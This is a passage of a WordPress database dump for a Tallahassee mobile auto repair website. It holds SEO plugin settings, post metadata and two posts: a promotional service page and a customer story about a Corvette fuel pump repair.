0:\"\";s:49:\"opseosetting-richsnippets-organization-email-text\";s:0:\"\";s:42:\"opseosetting-richsnippets-recipe-name-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-recipe-image-1-text\";s:0:\"\";s:49:\"opseosetting-richsnippets-recipe-summary-textarea\";s:0:\"\";s:49:\"opseosetting-richsnippets-recipe-cookingtime-text\";s:0:\"\";s:46:\"opseosetting-richsnippets-recipe-preptime-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-recipe-totaltime-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-recipe-yield-textarea\";s:0:\"\";s:46:\"opseosetting-richsnippets-recipe-calories-text\";s:0:\"\";s:41:\"opseosetting-richsnippets-recipe-fat-text\";s:0:\"\";s:43:\"opseosetting-richsnippets-recipe-sugar-text\";s:0:\"\";s:43:\"opseosetting-richsnippets-recipe-carbs-text\";s:0:\"\";s:43:\"opseosetting-richsnippets-recipe-fiber-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-recipe-protein-text\";s:0:\"\";s:49:\"opseosetting-richsnippets-recipe-cholesterol-text\";s:0:\"\";s:46:\"opseosetting-richsnippets-recipe-category-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-recipe-cuisine-text\";s:0:\"\";s:51:\"opseosetting-richsnippets-recipe-cookingmethod-text\";s:0:\"\";s:48:\"opseosetting-richsnippets-recipe-ingredient-text\";s:0:\"\";s:54:\"opseosetting-richsnippets-recipe-ingredientamount-text\";s:0:\"\";s:54:\"opseosetting-richsnippets-recipe-instructions-textarea\";s:0:\"\";s:46:\"opseosetting-richsnippets-recipe-rating-select\";s:0:\"\";s:45:\"opseosetting-richsnippets-recipe-reviews-text\";s:0:\"\";s:41:\"opseosetting-richsnippets-event-name-text\";s:0:\"\";s:44:\"opseosetting-richsnippets-event-image-1-text\";s:0:\"\";s:40:\"opseosetting-richsnippets-event-url-text\";s:0:\"\";s:52:\"opseosetting-richsnippets-event-description-textarea\";s:0:\"\";s:43:\"opseosetting-richsnippets-event-type-select\";s:0:\"\";s:46:\"opseosetting-richsnippets-event-startdate-text\";s:0:\"\";s:44:\"opseosetting-richsnippets-event-enddate-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-event-duration-text\";s:0:\"\";s:44:\"opseosetting-richsnippets-event-address-text\";s:0:\"\";s:41:\"opseosetting-richsnippets-event-city-text\";s:0:\"\";s:42:\"opseosetting-richsnippets-event-state-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-event-postalcode-text\";s:0:\"\";s:46:\"opseosetting-richsnippets-event-country-select\";s:0:\"\";s:41:\"opseosetting-richsnippets-music-name-text\";s:0:\"\";s:42:\"opseosetting-richsnippets-music-album-text\";s:0:\"\";s:40:\"opseosetting-richsnippets-music-url-text\";s:0:\"\";s:44:\"opseosetting-richsnippets-music-image-1-text\";s:0:\"\";s:41:\"opseosetting-richsnippets-music-song-text\";s:0:\"\";s:50:\"opseosetting-richsnippets-music-song-duration-text\";s:0:\"\";s:44:\"opseosetting-richsnippets-software-name-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-software-image-1-text\";s:0:\"\";s:55:\"opseosetting-richsnippets-software-description-textarea\";s:0:\"\";s:43:\"opseosetting-richsnippets-software-url-text\";s:0:\"\";s:46:\"opseosetting-richsnippets-software-author-text\";s:0:\"\";s:52:\"opseosetting-richsnippets-software-features-textarea\";s:0:\"\";s:50:\"opseosetting-richsnippets-software-category-select\";s:0:\"\";s:51:\"opseosetting-richsnippets-software-subcategory-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-software-version-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-software-price-text\";s:0:\"\";s:50:\"opseosetting-richsnippets-software-currency-select\";s:0:\"\";s:52:\"opseosetting-richsnippets-software-esrbrating-select\";s:0:\"\";s:50:\"opseosetting-richsnippets-software-language-select\";s:0:\"\";s:51:\"opseosetting-richsnippets-software-releasedate-text\";s:0:\"\";s:46:\"opseosetting-richsnippets-software-os-textarea\";s:0:\"\";s:56:\"opseosetting-richsnippets-software-releasenotes-textarea\";s:0:\"\";s:48:\"opseosetting-richsnippets-software-rating-select\";s:0:\"\";s:47:\"opseosetting-richsnippets-software-reviews-text\";s:0:\"\";s:41:\"opseosetting-richsnippets-video-name-text\";s:0:\"\";s:44:\"opseosetting-richsnippets-video-image-1-text\";s:0:\"\";s:40:\"opseosetting-richsnippets-video-url-text\";s:0:\"\";s:52:\"opseosetting-richsnippets-video-description-textarea\";s:0:\"\";s:47:\"opseosetting-richsnippets-video-uploaddate-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-video-duration-text\";s:0:\"\";s:44:\"opseosetting-richsnippets-video-expires-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-video-embedurl-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-video-rating-select\";s:0:\"\";s:44:\"opseosetting-richsnippets-video-reviews-text\";s:0:\"\";s:59:\"opseosetting-richsnippets-design-box-background-colorpicker\";s:7:\"#f5f5f5\";s:61:\"opseosetting-richsnippets-design-title-background-colorpicker\";s:7:\"#e4e4e4\";s:57:\"opseosetting-richsnippets-design-border-color-colorpicker\";s:7:\"#acacac\";s:58:\"opseosetting-richsnippets-design-snippet-color-colorpicker\";s:7:\"#373737\";s:43:\"opseosetting-richsnippets-design-width-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-design-display-select\";s:0:\"\";}}");
INSERT INTO `wp_postmeta` VALUES("112", "14", "_WPMREDOPTION_RedirectURL", "");
INSERT INTO `wp_postmeta` VALUES("113", "14", "_WPMREDOPTION_RedirectNever", "");
INSERT INTO `wp_postmeta` VALUES("115", "25", "_WPMREDOPTION_RedirectURL", "");
INSERT INTO `wp_postmeta` VALUES("116", "25", "_WPMREDOPTION_RedirectNever", "");
INSERT INTO `wp_postmeta` VALUES("117", "70", "_WPMREDOPTION_RedirectURL", "");
INSERT INTO `wp_postmeta` VALUES("118", "70", "_WPMREDOPTION_RedirectNever", "");
INSERT INTO `wp_postmeta` VALUES("121", "27", "_WPMREDOPTION_RedirectURL", "");
INSERT INTO `wp_postmeta` VALUES("122", "27", "_WPMREDOPTION_RedirectNever", "");
INSERT INTO `wp_postmeta` VALUES("138", "97", "_wp_attached_file", "2015/02/Mobile-Header.png");
INSERT INTO `wp_postmeta` VALUES("139", "97", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:934;s:6:\"height\";i:309;s:4:\"file\";s:25:\"2015/02/Mobile-Header.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Mobile-Header-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Mobile-Header-300x99.png\";s:5:\"width\";i:300;s:6:\"height\";i:99;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"single-post-thumbnail\";a:4:{s:4:\"file\";s:23:\"Mobile-Header-75x25.png\";s:5:\"width\";i:75;s:6:\"height\";i:25;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("153", "59", "_WPMREDOPTION_RedirectURL", "");
INSERT INTO `wp_postmeta` VALUES("154", "59", "_WPMREDOPTION_RedirectNever", "");
INSERT INTO `wp_postmeta` VALUES("160", "14", "p1cm-meta-word-count", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("161", "14", "_p1cm_next_meta_key", "2015-02-14 04:01:17");
INSERT INTO `wp_postmeta` VALUES("162", "14", "p1cm-meta-keywords", "a:25:{s:15:\"primary_keyword\";s:18:\"mobile auto repair\";s:18:\"secondary_keyword1\";s:16:\"mobile mechanics\";s:18:\"secondary_keyword2\";s:20:\"the mobile mechanics\";s:18:\"secondary_keyword3\";s:17:\"mobile car repair\";s:18:\"secondary_keyword4\";s:15:\"mobile mechanic\";s:13:\"primary_count\";i:2;s:15:\"primary_density\";d:1.3300000000000000710542735760100185871124267578125;s:12:\"primary_rank\";s:0:\"\";s:17:\"primary_last_rank\";s:0:\"\";s:16:\"secondary_count1\";i:2;s:18:\"secondary_density1\";d:0.89000000000000001332267629550187848508358001708984375;s:15:\"secondary_rank1\";s:0:\"\";s:20:\"secondary_last_rank1\";s:0:\"\";s:16:\"secondary_count2\";i:1;s:18:\"secondary_density2\";d:0.67000000000000003996802888650563545525074005126953125;s:15:\"secondary_rank2\";s:0:\"\";s:20:\"secondary_last_rank2\";s:0:\"\";s:16:\"secondary_count3\";i:0;s:18:\"secondary_density3\";d:0;s:15:\"secondary_rank3\";s:0:\"\";s:20:\"secondary_last_rank3\";s:0:\"\";s:16:\"secondary_count4\";i:4;s:18:\"secondary_density4\";d:1.7800000000000000266453525910037569701671600341796875;s:15:\"secondary_rank4\";s:0:\"\";s:20:\"secondary_last_rank4\";s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("163", "14", "p1cm-meta-data", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("169", "27", "p1cm-meta-word-count", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("170", "27", "_p1cm_next_meta_key", "2015-02-14 02:53:01");
INSERT INTO `wp_postmeta` VALUES("171", "27", "p1cm-meta-keywords", "a:25:{s:15:\"primary_keyword\";s:13:\"engine repair\";s:18:\"secondary_keyword1\";s:11:\"auto repair\";s:18:\"secondary_keyword2\";s:10:\"car repair\";s:18:\"secondary_keyword3\";s:22:\"mobile reapir mechanic\";s:18:\"secondary_keyword4\";s:16:\"repair mechanics\";s:13:\"primary_count\";i:0;s:15:\"primary_density\";d:0;s:12:\"primary_rank\";s:0:\"\";s:17:\"primary_last_rank\";s:0:\"\";s:16:\"secondary_count1\";i:5;s:18:\"secondary_density1\";d:2.270000000000000017763568394002504646778106689453125;s:15:\"secondary_rank1\";s:0:\"\";s:20:\"secondary_last_rank1\";s:0:\"\";s:16:\"secondary_count2\";i:0;s:18:\"secondary_density2\";d:0;s:15:\"secondary_rank2\";s:0:\"\";s:20:\"secondary_last_rank2\";s:0:\"\";s:16:\"secondary_count3\";i:0;s:18:\"secondary_density3\";d:0;s:15:\"secondary_rank3\";s:0:\"\";s:20:\"secondary_last_rank3\";s:0:\"\";s:16:\"secondary_count4\";i:1;s:18:\"secondary_density4\";d:0.450000000000000011102230246251565404236316680908203125;s:15:\"secondary_rank4\";s:0:\"\";s:20:\"secondary_last_rank4\";s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("172", "27", "p1cm-meta-data", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("176", "70", "p1cm-meta-word-count", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("177", "70", "_p1cm_next_meta_key", "2015-02-14 02:55:36");
INSERT INTO `wp_postmeta` VALUES("178", "70", "p1cm-meta-keywords", "a:25:{s:15:\"primary_keyword\";s:18:\"mobile auto repair\";s:18:\"secondary_keyword1\";s:10:\"car repair\";s:18:\"secondary_keyword2\";s:20:\"the mobile mechanics\";s:18:\"secondary_keyword3\";s:20:\"mobile car mechanics\";s:18:\"secondary_keyword4\";s:17:\"mobile car repair\";s:13:\"primary_count\";i:0;s:15:\"primary_density\";d:0;s:12:\"primary_rank\";s:0:\"\";s:17:\"primary_last_rank\";s:0:\"\";s:16:\"secondary_count1\";i:0;s:18:\"secondary_density1\";d:0;s:15:\"secondary_rank1\";s:0:\"\";s:20:\"secondary_last_rank1\";s:0:\"\";s:16:\"secondary_count2\";i:1;s:18:\"secondary_density2\";d:1.100000000000000088817841970012523233890533447265625;s:15:\"secondary_rank2\";s:0:\"\";s:20:\"secondary_last_rank2\";s:0:\"\";s:16:\"secondary_count3\";i:0;s:18:\"secondary_density3\";d:0;s:15:\"secondary_rank3\";s:0:\"\";s:20:\"secondary_last_rank3\";s:0:\"\";s:16:\"secondary_count4\";i:0;s:18:\"secondary_density4\";d:0;s:15:\"secondary_rank4\";s:0:\"\";s:20:\"secondary_last_rank4\";s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("179", "70", "p1cm-meta-data", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("180", "55", "_edit_last", "1");
INSERT INTO `wp_postmeta` VALUES("181", "55", "_WPMREDOPTION_RedirectURL", "");
INSERT INTO `wp_postmeta` VALUES("182", "55", "_WPMREDOPTION_RedirectNever", "");
INSERT INTO `wp_postmeta` VALUES("183", "55", "p1cm-meta-word-count", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("184", "55", "_p1cm_next_meta_key", "2015-02-14 02:57:25");
INSERT INTO `wp_postmeta` VALUES("185", "55", "p1cm-meta-keywords", "a:25:{s:15:\"primary_keyword\";s:0:\"\";s:18:\"secondary_keyword1\";s:0:\"\";s:18:\"secondary_keyword2\";s:0:\"\";s:18:\"secondary_keyword3\";s:0:\"\";s:18:\"secondary_keyword4\";s:0:\"\";s:13:\"primary_count\";s:0:\"\";s:15:\"primary_density\";s:0:\"\";s:12:\"primary_rank\";s:0:\"\";s:17:\"primary_last_rank\";s:0:\"\";s:16:\"secondary_count1\";s:0:\"\";s:18:\"secondary_density1\";s:0:\"\";s:15:\"secondary_rank1\";s:0:\"\";s:20:\"secondary_last_rank1\";s:0:\"\";s:16:\"secondary_count2\";s:0:\"\";s:18:\"secondary_density2\";s:0:\"\";s:15:\"secondary_rank2\";s:0:\"\";s:20:\"secondary_last_rank2\";s:0:\"\";s:16:\"secondary_count3\";s:0:\"\";s:18:\"secondary_density3\";s:0:\"\";s:15:\"secondary_rank3\";s:0:\"\";s:20:\"secondary_last_rank3\";s:0:\"\";s:16:\"secondary_count4\";s:0:\"\";s:18:\"secondary_density4\";s:0:\"\";s:15:\"secondary_rank4\";s:0:\"\";s:20:\"secondary_last_rank4\";s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("186", "55", "p1cm-meta-data", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("187", "57", "_edit_last", "1");
INSERT INTO `wp_postmeta` VALUES("188", "57", "_WPMREDOPTION_RedirectURL", "");
INSERT INTO `wp_postmeta` VALUES("189", "57", "_WPMREDOPTION_RedirectNever", "");
INSERT INTO `wp_postmeta` VALUES("190", "57", "p1cm-meta-word-count", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("191", "57", "_p1cm_next_meta_key", "2015-02-14 02:58:24");
INSERT INTO `wp_postmeta` VALUES("192", "57", "p1cm-meta-keywords", "a:25:{s:15:\"primary_keyword\";s:0:\"\";s:18:\"secondary_keyword1\";s:0:\"\";s:18:\"secondary_keyword2\";s:0:\"\";s:18:\"secondary_keyword3\";s:0:\"\";s:18:\"secondary_keyword4\";s:0:\"\";s:13:\"primary_count\";s:0:\"\";s:15:\"primary_density\";s:0:\"\";s:12:\"primary_rank\";s:0:\"\";s:17:\"primary_last_rank\";s:0:\"\";s:16:\"secondary_count1\";s:0:\"\";s:18:\"secondary_density1\";s:0:\"\";s:15:\"secondary_rank1\";s:0:\"\";s:20:\"secondary_last_rank1\";s:0:\"\";s:16:\"secondary_count2\";s:0:\"\";s:18:\"secondary_density2\";s:0:\"\";s:15:\"secondary_rank2\";s:0:\"\";s:20:\"secondary_last_rank2\";s:0:\"\";s:16:\"secondary_count3\";s:0:\"\";s:18:\"secondary_density3\";s:0:\"\";s:15:\"secondary_rank3\";s:0:\"\";s:20:\"secondary_last_rank3\";s:0:\"\";s:16:\"secondary_count4\";s:0:\"\";s:18:\"secondary_density4\";s:0:\"\";s:15:\"secondary_rank4\";s:0:\"\";s:20:\"secondary_last_rank4\";s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("193", "57", "p1cm-meta-data", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("194", "59", "p1cm-meta-word-count", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("195", "59", "_p1cm_next_meta_key", "2015-02-14 02:59:07");
INSERT INTO `wp_postmeta` VALUES("196", "59", "p1cm-meta-keywords", "a:25:{s:15:\"primary_keyword\";s:0:\"\";s:18:\"secondary_keyword1\";s:0:\"\";s:18:\"secondary_keyword2\";s:0:\"\";s:18:\"secondary_keyword3\";s:0:\"\";s:18:\"secondary_keyword4\";s:0:\"\";s:13:\"primary_count\";s:0:\"\";s:15:\"primary_density\";s:0:\"\";s:12:\"primary_rank\";s:0:\"\";s:17:\"primary_last_rank\";s:0:\"\";s:16:\"secondary_count1\";s:0:\"\";s:18:\"secondary_density1\";s:0:\"\";s:15:\"secondary_rank1\";s:0:\"\";s:20:\"secondary_last_rank1\";s:0:\"\";s:16:\"secondary_count2\";s:0:\"\";s:18:\"secondary_density2\";s:0:\"\";s:15:\"secondary_rank2\";s:0:\"\";s:20:\"secondary_last_rank2\";s:0:\"\";s:16:\"secondary_count3\";s:0:\"\";s:18:\"secondary_density3\";s:0:\"\";s:15:\"secondary_rank3\";s:0:\"\";s:20:\"secondary_last_rank3\";s:0:\"\";s:16:\"secondary_count4\";s:0:\"\";s:18:\"secondary_density4\";s:0:\"\";s:15:\"secondary_rank4\";s:0:\"\";s:20:\"secondary_last_rank4\";s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("197", "59", "p1cm-meta-data", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("198", "58", "_edit_lock", "1423277877:1");
INSERT INTO `wp_postmeta` VALUES("199", "58", "_edit_last", "1");
INSERT INTO `wp_postmeta` VALUES("200", "58", "_WPMREDOPTION_RedirectURL", "");
INSERT INTO `wp_postmeta` VALUES("201", "58", "_WPMREDOPTION_RedirectNever", "");
INSERT INTO `wp_postmeta` VALUES("202", "58", "p1cm-meta-word-count", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("203", "58", "_p1cm_next_meta_key", "2015-02-14 02:59:44");
INSERT INTO `wp_postmeta` VALUES("204", "58", "p1cm-meta-keywords", "a:25:{s:15:\"primary_keyword\";s:0:\"\";s:18:\"secondary_keyword1\";s:0:\"\";s:18:\"secondary_keyword2\";s:0:\"\";s:18:\"secondary_keyword3\";s:0:\"\";s:18:\"secondary_keyword4\";s:0:\"\";s:13:\"primary_count\";s:0:\"\";s:15:\"primary_density\";s:0:\"\";s:12:\"primary_rank\";s:0:\"\";s:17:\"primary_last_rank\";s:0:\"\";s:16:\"secondary_count1\";s:0:\"\";s:18:\"secondary_density1\";s:0:\"\";s:15:\"secondary_rank1\";s:0:\"\";s:20:\"secondary_last_rank1\";s:0:\"\";s:16:\"secondary_count2\";s:0:\"\";s:18:\"secondary_density2\";s:0:\"\";s:15:\"secondary_rank2\";s:0:\"\";s:20:\"secondary_last_rank2\";s:0:\"\";s:16:\"secondary_count3\";s:0:\"\";s:18:\"secondary_density3\";s:0:\"\";s:15:\"secondary_rank3\";s:0:\"\";s:20:\"secondary_last_rank3\";s:0:\"\";s:16:\"secondary_count4\";s:0:\"\";s:18:\"secondary_density4\";s:0:\"\";s:15:\"secondary_rank4\";s:0:\"\";s:20:\"secondary_last_rank4\";s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("205", "58", "p1cm-meta-data", "a:0:{}");
INSERT INTO `wp_postmeta` VALUES("206", "55", "social-acc-auto-share-post", "false");
INSERT INTO `wp_postmeta` VALUES("207", "59", "social-acc-auto-share-post", "false");
INSERT INTO `wp_postmeta` VALUES("208", "57", "social-acc-auto-share-post", "false");
INSERT INTO `wp_postmeta` VALUES("209", "56", "social-acc-auto-share-post", "false");
INSERT INTO `wp_postmeta` VALUES("210", "58", "social-acc-auto-share-post", "false");
INSERT INTO `wp_postmeta` VALUES("212", "14", "social-acc-auto-share-post", "true");
INSERT INTO `wp_postmeta` VALUES("219", "56", "_WPMREDOPTION_RedirectURL", "");
INSERT INTO `wp_postmeta` VALUES("220", "56", "_WPMREDOPTION_RedirectNever", "");
INSERT INTO `wp_postmeta` VALUES("229", "70", "social-acc-auto-share-post", "true");
INSERT INTO `wp_postmeta` VALUES("230", "27", "social-acc-auto-share-post", "true");
INSERT INTO `wp_postmeta` VALUES("231", "25", "social-acc-auto-share-post", "true");

/* INSERT TABLE DATA: wp_posts */
INSERT INTO `wp_posts` VALUES("13", "1", "2015-02-02 19:36:29", "0000-00-00 00:00:00", "", "Auto Draft", "", "auto-draft", "closed", "closed", "", "", "", "", "2015-02-02 19:36:29", "0000-00-00 00:00:00", "", "0", "http://tallahassee.themobilemechanics.org/?p=13", "0", "post", "", "0");
INSERT INTO `wp_posts` VALUES("14", "1", "2015-02-03 08:14:35", "2015-02-03 13:14:35", "<em><span style=\"color: #ff0000;\"><span style=\"font-size: 2em; line-height: 1.5em;\">“Tallahassee Mobile Auto Repair - Greased Lighting  Service ”</span></span></em>\r\n<h2>Mobile Auto Repair Mechanics in Tallahassee Florida are now available for car repairs at home or your place of business even roadside emergency repairs.</h2>\r\n<h2>For your convenience we can now send auto mechanics straight to your home, office or place of business to fix your car - truck or van to ware you are.</h2>\r\n<h2>For the best A.O.K. Mobile Mechanics in Tallahassee FL call your \"Tallahassee<strong> Mobile Mechanic\"</strong> at -</h2>\r\n<h2><span style=\"font-size: 2em; line-height: 1.5em;\">CALL US NOW: *<span class=\"number\" style=\"color: #333300;\">(813) 361-1384</span></span></h2>\r\n<h2></h2>\r\n<a href=\"http://tallahassee.themobilemechanics.org/\"><img class=\"alignleft size-full wp-image-48\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mechanic-auto-repair.jpg\" alt=\"Mechanic-auto-repair\" width=\"300\" height=\"210\" /></a>\r\n<h3><span style=\"font-family: Georgia; color: black;\">There are many vantages for using mobile mechanic vs. a conventional auto repair shop.</span></h3>\r\n<h3><span style=\"font-family: Georgia; color: black;\">The conventional factor of a mobile mechanic showing up at your home or place of business wins big time!</span></h3>\r\n<h3 style=\"orphans: auto; text-align: start; widows: auto; -webkit-text-stroke-width: 0px; word-spacing: 0px;\"><span style=\"color: #000000;\"><span style=\"font-family: Georgia; color: black;\">Especially when compared to waiting around all day, for your vehicle just to come inline to be look at for service.</span></span></h3>\r\n<h3 style=\"orphans: auto; text-align: start; widows: auto; -webkit-text-stroke-width: 0px; word-spacing: 0px;\"><span style=\"color: #000000;\"><span style=\"font-family: Georgia; color: black;\">Being able to do whatever you like at home or office while the dedicated mechanic performs the service task at hand, rather than having to wait at an auto repair service department is a great advantage &amp; gain for you!</span></span></h3>\r\n<h3></h3>\r\n<h3>With a mobile mechanic you are able to speak directly to the mechanics, about how to carry out any repair issues without delay; likewise, being able to meet at your place of business or at home.</h3>\r\n<h2><span style=\"color: #ff0000;\">Make an appointment for your <span style=\"text-decoration: underline;\">auto repairs</span> today!</span></h2>\r\n<h1>CALL US NOW:  <span class=\"number\" style=\"color: #333300;\"> (813) 361-1384</span></h1>\r\n&nbsp;\r\n<h1 style=\"text-align: center;\">How It Works!</h1>\r\n<h2><span style=\"color: #ff0000;\">Requesting auto repairs is easy with The Mobile Mechanics.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">If you know what the issue is we can help you with the purchase of the parts and give you a general estimate over the phone to what the cost should be.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">If you do not know what the problem is then we can come over to where your vehicle is and perform a computer diagnostic service to trouble shoot and find the problems.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">Our at home, office and roadside diagnostic service calls are around $75 which covers the time &amp; expenses to come out to diagnose your vehicle’s problems, and if we do the repair job at that same time then the diagnostics can be free “only charging for the first hour of labor” to fix the issues.</span></h2>\r\n<h2><span style=\"color: #000000; font-family: arial, helvetica, sans-serif;\">All work guaranteed! All you\'ve have to do is call or fill out the inquiry form on this website now.</span></h2>\r\n<h1></h1>\r\n<h3><strong>Broken Down Car Truck o<img class=\"alignleft wp-image-54 size-full\" title=\"Miami Florida The Mobile Mechanic \" src=\"http://www.miamifl.themobilemechanics.org/wp-content/uploads/2014/03/Miami-FL-Mobile-Mechanics.jpg\" alt=\"Miami FL Mobile Mechanics\" width=\"150\" height=\"150\" /></strong>r Van?</h3>\r\n<h2 style=\"text-align: center;\">Why Not Have The Auto Mechanics</h2>\r\n<h2 style=\"text-align: center;\">come to you!</h2>\r\n<h3 style=\"text-align: center;\">The Traveling “Auto Care Mechanic\" For <em>Car Maintenance</em> and <em>Auto Repair</em>.</h3>\r\n<h4>Hi ho hi-ho, you hopped into your car and it just won\'t go, and suddenly you think you need a tow!</h4>\r\n<h4>To get back on the road again “you may-not-need to call around for towing services, and auto shops “</h4>\r\n<h4>There is a new &amp; better way “just call your neighborhood mobile mechanic”.</h4>\r\n<h4></h4>\r\n<h3><iframe src=\"//www.youtube.com/embed/LjFLoOo-ViM?rel=0\" width=\"560\" height=\"315\" frameborder=\"0\"></iframe></h3>\r\n&nbsp;\r\n<h2><em>Talk to a mechanic now: </em></h2>\r\n<h1><span class=\"number\" style=\"color: #333300;\">(813) 361-1384</span>\r\n<img class=\"alignright size-full wp-image-38\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mobile-Mechanic.jpg\" alt=\"Mobile-Mechanic\" width=\"150\" height=\"150\" /></h1>\r\n<img class=\"alignleft size-full wp-image-48\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Mechanic-auto-repair.jpg\" alt=\"Mechanic-auto-repair\" width=\"300\" height=\"210\" />", "Auto Repair Service", "", "publish", "closed", "closed", "", "auto-repair-service", "", "", "2015-02-07 22:02:09", "2015-02-08 03:02:09", "", "0", "http://tallahassee.themobilemechanics.org/?p=14", "0", "post", "", "0");
INSERT INTO `wp_posts` VALUES("25", "1", "2015-02-02 17:03:19", "2015-02-02 22:03:19", "<strong>A true story.</strong>\r\n<h3>I was racing around enjoying a Sunday drive in my new 1969 corvette convertible sports car (new to me) “got a great deal” from the dealer!</h3>\r\n<h3> All of a sudden “I heard noises” so I pulled over to the side of the road “hoping it was not the engine braking down.</h3>\r\n<h3>After looking under the hood, but not knowing what to look for I notice a church. So saying a small prayer “as I tried starting it would not start. So I said a longer prayer and this time it started right-up.</h3>\r\n<h3>Now knowing I should get the engine look-at, I started my way back home and again clack-clack-clack my modified V-8 engine power down.</h3>\r\n<h3> This time I was stuck in front of a hospital and needed<em> auto repair help</em>! I loved my car &amp; the great performance it provides and praying was not doing it this time.</h3>\r\n<h3> So force to look for help using my smart phone I googled “<em>car shops near me.</em>“</h3>\r\n<h3><a href=\"http://tallahassee.themobilemechanics.org/\"><img class=\"alignleft size-full wp-image-45\" src=\"http://tallahassee.themobilemechanics.org/wp-content/uploads/2015/02/Roadside-assistance.jpg\" alt=\"Roadside-assistance\" width=\"221\" height=\"136\" /></a> Finding <em>auto shops open on Sunday</em> was not easy.</h3>\r\n<h3>After several calls <em>the on call mechanic</em> said I need to have the <em>car towed</em> in.</h3>\r\n<h3>I thought man this <em>auto repair</em> is going to cost me big time.</h3>\r\n<h3> Just between the insurance &amp; registration cost &amp; now this. My driving pleasures were going to be on-hold.</h3>\r\n<h3> So Googling for “<em>towing companies</em>” I saw this website “<strong>The Mobile Mechanics</strong> Auto Repair Service”.  <em>A car mechanic that comes to you;</em></h3>\r\n<h3>This is what I needed, road side assistance.</h3>\r\n<h3> <em>The mechanic</em> said he was <em>On the road</em> and <em>near me.</em></h3>\r\n<h3>With in a few minutes after showing up he diagnose the problem and it was the fuel pump.</h3>\r\n<h3>Long story short the <em>mobilemechanic </em>was able to pick one up and install it for me on the spot, all for less than a C-note.</h3>\r\n<h3>I thank him he gave me his card &amp;  recommend that I should consider having the fuel pump re-located, way back closer to the tank, as the fuel pump should be pushing gas rather than pulling it.</h3>\r\n<h3> A simple fix he said just a few more parts that I could order online to save big time, and one hour labor.  He wrote the parts needed &amp; a quote on the back of his card.</h3>\r\n<h3> A few weeks later I went back to the <em>dealer ware</em> I bought my corvette. Their <em>auto shop department</em> also said that it was a good idea about relocating the pump; &amp; gave me an estimate for twice the amount the mobile mechanic would do it for me.</h3>\r\n<h3> I ordered the parts online like the mobile mechanic guy suggested and scheduled the <em>at home car repair</em> to re-locate the fuel pump. Works fine ever since!</h3>\r\n<h3> Now I refer to him as <em>my mobile mechanic</em> to all my friends and family.</h3>\r\n<h3> Later I found out from the salesmen who sold me the corvette that this was the problem the previous owner was having. Probably why I got a good deal, you think?</h3>\r\n<h3> He wanted to buy the car back from me but no way – I love my new corvette.</h3>\r\n<h3> Car mechanics that come to your house, what a great idea!</h3>\r\n<h3> Drive in pleasure safely,</h3>\r\n<h3> Karin Alan</h3>\r\n<h3>The happy Sunday driver</h3>", "A true story", "", "publish", "closed", "closed", "", "a-true-story", "", "", "2015-02-06 12:15:10", "2015-02-06 17:15:10", "", "0", "http://tallahassee.themobilemechanics.org/?p=25", "0", "post", "", "0");
